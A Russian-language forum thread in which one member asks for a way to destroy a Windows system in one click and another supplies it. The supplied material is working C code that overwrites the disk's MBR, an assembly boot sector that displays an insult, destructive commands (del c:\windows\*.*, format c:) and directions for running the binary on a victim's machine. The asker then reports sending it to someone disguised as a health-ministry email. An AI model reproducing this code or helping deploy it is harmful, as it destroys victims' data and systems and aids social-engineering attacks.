Поиск по сайту
Форумы 
Реклама
|
| Просмотров - 4297
| | флэшка для удаления системного раздела | | Добавить этот топик в закладки » | | | RSS-лента ответов » | 
|
|
k86-1
Novice | # | Сообщение добавлено 28.05.2012 16:13:53 всем привет!
у меня вопрос:
существует ли в природе софтина,вирус,команда бат или хоть что нибудь что может буквально одним кликом уничтожить систему из под которой оно и запущено?
или автоматом при запуске винды или автозапуском с флэхи? | | Сказать спасибо Ответить Цитировать |
| codemaster
Platinum Member | # | Сообщение добавлено 28.05.2012 19:19:12 Отредактировано 28.05.2012 19:24:23 by codemaster ну например программа на си:
HANDLE hFile;
void *stub;
DWORD readed;
stub=malloc(512);
memset(stub,0,512);
hFile=CreateFile("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
WriteFile(hFile,stub,512,&readed,NULL);
CloseHandle(hFile);
при следующей загрузке биос не сможет найти MBR на жоском диске, но опытный юзер пропишет в консоле восстановления венды fixmbr и все станет как было. по крайней мере должно 
более чоткие кодеры сначала пишут код для бутсектора на ASM, потом снимают с нее дамп и пишут в мбр. получается намного веселее. например:
USE16
;------------ загрузочный сектор ---------------------
org 7C00h
EntryPoint:
mov ax, cs ;сегмент кода
cli ; запрещаем прерывания
mov ss, ax ;зададим сегмент стэка, кода, данных - все в одном месте
mov ds, ax
mov es, ax
mov sp, EntryPoint ; зададим адрес старта программы как вершина стека
sti ; разрешаем прерывания т.к. уже можно нормально с ними работать
cld ; ставим флаг направления
mov ax, 3 ; 80x25
int 10h
xor dx, dx ; X = 0, Y = 0
mov bx, 15 ; цвет
mov ax, 1301h ; AL = 1 Передвигать курсор , AH = 13h Вывод строки
mov bp, BootMsg ; адрес сообщения
mov cx, BootMsgEnd - BootMsg
int 10h ; выводим текст
xor ax, ax ; AH = 0 (ожидать нажатие)
int 16h ; ждем нажатие клавиши
jmp 0FFFFh:0000h ; reboot
;------------ данные загрузочного сектора--------------
BootMsg db "владелец компа гей и лох :D"
BootMsgEnd:
TIMES 510-($-$$) DB 0 ; Заполняем оставшееся пространство от 500 байт нулями
DW 0AA55h ; Сигнатура конца загрузочного сектора
существуют более простые методы убить форточки, но они не интересные. например в командной строке пропиши:
del c:\windows\*.*
или
format c:\ /fs:NTFS /q
| | Сказать спасибо Ответить Цитировать |
| k86-1
Novice | # | Сообщение добавлено 29.05.2012 03:15:13 хм...вариант №1 сохраняем,придаем расширение дописываем авторан и все?
это как защита от совсем дерева.
это дерево не запустит мбр | | Сказать спасибо Ответить Цитировать |
| codemaster
Platinum Member | # | Сообщение добавлено 29.05.2012 07:23:08 нет. создаем программу на си, вставляем код, компилируем, бинарник запускаем у жертвы на компьютере.
если второй вариант, то компилируем mbr-обираз fasm-ом, снимаем HEX-дамп, и переписываем программу на си чтобы она записывала образ в mbr, вместо того чтобы обнулять его | | Сказать спасибо Ответить Цитировать |
| k86-1
Novice | # | Сообщение добавлено 29.05.2012 15:32:44 jj jf i7uu,;
!!!!
спасибо!
пациент даже не мучался-с автораном не заморачивался,послал письмо от минздрава.
он же авторитет.
дерево все сделало своими руками.
спасибо. | | Сказать спасибо Ответить Цитировать |
|
|
Разместить рекламу 
